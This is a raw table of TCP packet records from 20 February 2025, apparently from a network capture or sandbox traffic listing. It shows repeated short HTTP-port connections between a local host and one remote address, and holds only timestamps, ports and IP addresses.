Feb 20, 2025 03:43:52.714760065 CET	80	49757	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:52.714834929 CET	49757	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:52.716670990 CET	49757	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:52.721688032 CET	80	49757	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:52.721740961 CET	49757	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:52.726766109 CET	80	49757	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:53.545025110 CET	80	49757	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:53.545130968 CET	49757	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:53.545607090 CET	80	49757	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:53.545715094 CET	49757	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:53.550247908 CET	80	49757	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:54.679311037 CET	49758	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:54.685576916 CET	80	49758	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:54.685664892 CET	49758	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:54.687501907 CET	49758	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:54.693295956 CET	80	49758	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:54.693351030 CET	49758	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:54.700922012 CET	80	49758	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:55.482131958 CET	80	49758	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:55.482261896 CET	49758	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:55.482913017 CET	80	49758	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:55.482965946 CET	49758	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:55.488426924 CET	80	49758	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:56.643157959 CET	49759	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:56.648370981 CET	80	49759	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:56.650684118 CET	49759	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:56.653667927 CET	49759	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:56.660065889 CET	80	49759	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:56.661304951 CET	49759	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:56.666481972 CET	80	49759	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:57.403055906 CET	80	49759	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:57.403204918 CET	49759	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:57.403400898 CET	80	49759	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:57.403481007 CET	49759	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:57.408242941 CET	80	49759	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:58.692567110 CET	49760	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:58.697757006 CET	80	49760	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:58.697813034 CET	49760	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:58.700609922 CET	49760	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:58.705652952 CET	80	49760	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:58.705694914 CET	49760	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:58.710659027 CET	80	49760	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:59.467822075 CET	80	49760	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:59.467932940 CET	49760	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:59.468637943 CET	80	49760	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:59.468717098 CET	49760	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:59.472980976 CET	80	49760	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:00.616983891 CET	49761	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:00.623682022 CET	80	49761	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:00.623759985 CET	49761	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:00.625502110 CET	49761	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:00.632122040 CET	80	49761	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:00.632178068 CET	49761	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:00.638731003 CET	80	49761	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:01.394223928 CET	80	49761	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:01.394606113 CET	49761	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:01.395112038 CET	80	49761	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:01.395246029 CET	49761	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:01.399671078 CET	80	49761	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:02.537031889 CET	49762	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:02.542150974 CET	80	49762	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:02.542227030 CET	49762	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:02.543962955 CET	49762	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:02.548974991 CET	80	49762	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:02.549015999 CET	49762	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:02.553988934 CET	80	49762	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:03.203638077 CET	80	49762	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:03.203757048 CET	49762	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:03.206147909 CET	80	49762	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:03.206203938 CET	49762	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:03.208739996 CET	80	49762	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:04.336026907 CET	49763	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:04.341181040 CET	80	49763	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:04.341250896 CET	49763	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:04.343209028 CET	49763	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:04.348192930 CET	80	49763	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:04.348268986 CET	49763	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:04.353270054 CET	80	49763	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:05.170475960 CET	80	49763	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:05.170717955 CET	49763	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:05.171680927 CET	80	49763	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:05.171741962 CET	49763	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:05.175755024 CET	80	49763	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:06.324538946 CET	49764	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:06.329794884 CET	80	49764	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:06.329929113 CET	49764	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:06.332422018 CET	49764	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:06.337491989 CET	80	49764	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:06.337593079 CET	49764	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:06.342581987 CET	80	49764	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:07.123472929 CET	80	49764	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:07.123723030 CET	49764	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:07.123982906 CET	80	49764	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:07.124043941 CET	49764	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:07.128756046 CET	80	49764	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:08.278520107 CET	49766	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:08.283663034 CET	80	49766	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:08.283873081 CET	49766	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:08.285682917 CET	49766	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:08.290653944 CET	80	49766	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:08.290721893 CET	49766	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:08.295722961 CET	80	49766	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:09.168638945 CET	80	49766	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:09.168849945 CET	49766	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:09.169111013 CET	80	49766	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:09.169847965 CET	49766	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:09.173953056 CET	80	49766	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:10.304547071 CET	49768	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:10.309679985 CET	80	49768	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:10.309794903 CET	49768	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:10.311546087 CET	49768	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:10.316589117 CET	80	49768	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:10.316672087 CET	49768	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:10.321664095 CET	80	49768	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:11.054193974 CET	80	49768	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:11.054295063 CET	49768	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:11.054579020 CET	80	49768	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:11.054635048 CET	49768	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:11.059393883 CET	80	49768	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:12.203788042 CET	49779	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:12.209014893 CET	80	49779	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:12.209108114 CET	49779	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:12.211334944 CET	49779	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:12.216310024 CET	80	49779	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:12.216352940 CET	49779	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:12.221415997 CET	80	49779	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:13.092571974 CET	80	49779	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:13.092683077 CET	49779	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:13.093388081 CET	80	49779	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:13.093441010 CET	49779	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:13.099060059 CET	80	49779	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:14.244458914 CET	49793	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:14.249562025 CET	80	49793	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:14.250744104 CET	49793	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:14.252463102 CET	49793	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:14.257539034 CET	80	49793	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:14.257584095 CET	49793	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:14.262612104 CET	80	49793	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:15.060792923 CET	80	49793	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:15.060888052 CET	49793	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:15.061045885 CET	80	49793	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:15.061105967 CET	49793	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:15.066840887 CET	80	49793	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:16.225214958 CET	49806	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:16.230372906 CET	80	49806	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:16.230448961 CET	49806	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:16.232182026 CET	49806	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:16.237139940 CET	80	49806	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:16.237190008 CET	49806	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:16.242496014 CET	80	49806	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:17.017465115 CET	80	49806	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:17.017875910 CET	49806	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:17.018348932 CET	80	49806	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:17.018413067 CET	49806	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:17.022996902 CET	80	49806	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:18.167665958 CET	49819	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:18.172710896 CET	80	49819	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:18.172801971 CET	49819	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:18.175738096 CET	49819	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:18.180736065 CET	80	49819	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:18.180783033 CET	49819	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:18.185780048 CET	80	49819	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:18.948215008 CET	80	49819	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:18.948385954 CET	49819	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:18.949486971 CET	80	49819	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:18.949531078 CET	49819	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:18.954293966 CET	80	49819	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:20.100064993 CET	49829	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:20.105267048 CET	80	49829	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:20.108989000 CET	49829	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:20.110713005 CET	49829	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:20.115772963 CET	80	49829	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:20.117513895 CET	49829	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:20.122565031 CET	80	49829	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:20.910202980 CET	80	49829	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:20.910586119 CET	80	49829	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:20.910589933 CET	49829	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:20.910681009 CET	49829	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:20.915777922 CET	80	49829	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:22.067795992 CET	49840	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:22.072905064 CET	80	49840	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:22.073009014 CET	49840	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:22.074762106 CET	49840	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:22.079927921 CET	80	49840	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:22.080002069 CET	49840	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:22.085092068 CET	80	49840	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:22.852338076 CET	80	49840	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:22.852440119 CET	49840	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:22.852443933 CET	80	49840	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:22.852547884 CET	49840	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:22.857460022 CET	80	49840	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:23.992754936 CET	49854	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:23.997817039 CET	80	49854	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:23.997884989 CET	49854	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:24.000293016 CET	49854	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:24.005387068 CET	80	49854	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:24.005440950 CET	49854	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:24.010552883 CET	80	49854	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:24.819494963 CET	80	49854	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:24.819766045 CET	80	49854	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:24.819833994 CET	49854	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:24.819834948 CET	49854	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:24.824961901 CET	80	49854	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:25.973829031 CET	49868	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:25.978925943 CET	80	49868	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:25.978996038 CET	49868	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:25.980731010 CET	49868	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:25.986779928 CET	80	49868	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:25.986831903 CET	49868	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:25.992993116 CET	80	49868	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:26.634171009 CET	80	49868	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:26.634314060 CET	49868	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:26.634809017 CET	80	49868	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:26.634867907 CET	49868	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:26.639425039 CET	80	49868	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:27.773267031 CET	49881	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:27.778352022 CET	80	49881	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:27.778445959 CET	49881	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:27.780179024 CET	49881	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:27.785200119 CET	80	49881	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:27.785264015 CET	49881	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:27.790318012 CET	80	49881	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:28.528862953 CET	80	49881	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:28.529010057 CET	49881	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:28.529839993 CET	80	49881	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:28.529906988 CET	49881	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:28.534085989 CET	80	49881	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:29.663084030 CET	49892	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:29.668252945 CET	80	49892	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:29.668344021 CET	49892	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:29.670077085 CET	49892	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:29.675196886 CET	80	49892	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:29.675257921 CET	49892	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:29.680320978 CET	80	49892	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:30.431359053 CET	80	49892	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:30.432185888 CET	80	49892	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:30.432255983 CET	49892	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:30.438566923 CET	49892	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:30.443763018 CET	80	49892	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:31.752507925 CET	49908	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:31.757873058 CET	80	49908	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:31.758806944 CET	49908	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:31.760562897 CET	49908	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:31.765650034 CET	80	49908	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:31.765736103 CET	49908	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:31.770921946 CET	80	49908	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:32.663177967 CET	80	49908	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:32.663290977 CET	49908	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:32.664463043 CET	80	49908	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:32.664778948 CET	49908	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:32.668380976 CET	80	49908	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:33.821858883 CET	49922	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:33.827024937 CET	80	49922	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:33.827148914 CET	49922	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:33.828871012 CET	49922	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:33.834100962 CET	80	49922	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:33.834170103 CET	49922	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:33.839224100 CET	80	49922	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:34.661083937 CET	80	49922	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:34.661211014 CET	49922	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:34.661756992 CET	80	49922	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:34.661808014 CET	49922	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:34.666251898 CET	80	49922	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:35.809420109 CET	49934	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:35.814973116 CET	80	49934	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:35.815040112 CET	49934	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:35.816777945 CET	49934	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:35.821729898 CET	80	49934	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:35.821784973 CET	49934	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:35.826771975 CET	80	49934	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:36.566781044 CET	80	49934	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:36.566884041 CET	49934	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:36.567120075 CET	80	49934	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:36.567157030 CET	49934	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:36.571862936 CET	80	49934	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:37.726314068 CET	49946	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:37.731537104 CET	80	49946	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:37.731621981 CET	49946	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:37.733357906 CET	49946	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:37.738429070 CET	80	49946	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:37.738492012 CET	49946	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:37.743565083 CET	80	49946	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:38.559964895 CET	80	49946	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:38.560384035 CET	49946	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:38.561394930 CET	80	49946	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:38.561562061 CET	49946	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:38.565397978 CET	80	49946	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:39.710850954 CET	49958	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:39.715945959 CET	80	49958	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:39.716037989 CET	49958	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:39.717734098 CET	49958	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:39.722753048 CET	80	49958	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:39.722811937 CET	49958	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:39.728333950 CET	80	49958	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:40.528428078 CET	80	49958	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:40.528512955 CET	49958	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:40.529413939 CET	80	49958	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:40.529463053 CET	49958	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:40.533588886 CET	80	49958	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:41.702842951 CET	49973	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:41.709501982 CET	80	49973	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:41.709698915 CET	49973	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:41.711992025 CET	49973	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:41.717864037 CET	80	49973	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:41.717938900 CET	49973	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:41.723023891 CET	80	49973	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:42.375356913 CET	80	49973	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:42.375593901 CET	49973	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:42.377259016 CET	80	49973	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:42.377321005 CET	49973	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:42.380786896 CET	80	49973	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:43.541484118 CET	49986	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:43.546560049 CET	80	49986	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:43.546792984 CET	49986	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:43.548425913 CET	49986	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:43.553795099 CET	80	49986	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:43.553868055 CET	49986	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:43.558932066 CET	80	49986	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:44.228435993 CET	80	49986	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:44.228842974 CET	80	49986	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:44.228853941 CET	49986	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:44.228941917 CET	49986	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:44.276000977 CET	80	49986	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:45.403678894 CET	49999	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:45.408778906 CET	80	49999	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:45.410855055 CET	49999	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:45.412970066 CET	49999	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:45.417984009 CET	80	49999	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:45.418211937 CET	49999	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:45.423207045 CET	80	49999	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:46.211839914 CET	80	49999	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:46.211857080 CET	80	49999	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:46.211967945 CET	49999	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:46.212276936 CET	49999	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:46.217279911 CET	80	49999	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:47.354126930 CET	50013	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:47.360059977 CET	80	50013	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:47.360138893 CET	50013	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:47.362063885 CET	50013	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:47.367743969 CET	80	50013	104.21.64.1	192.168.2.4
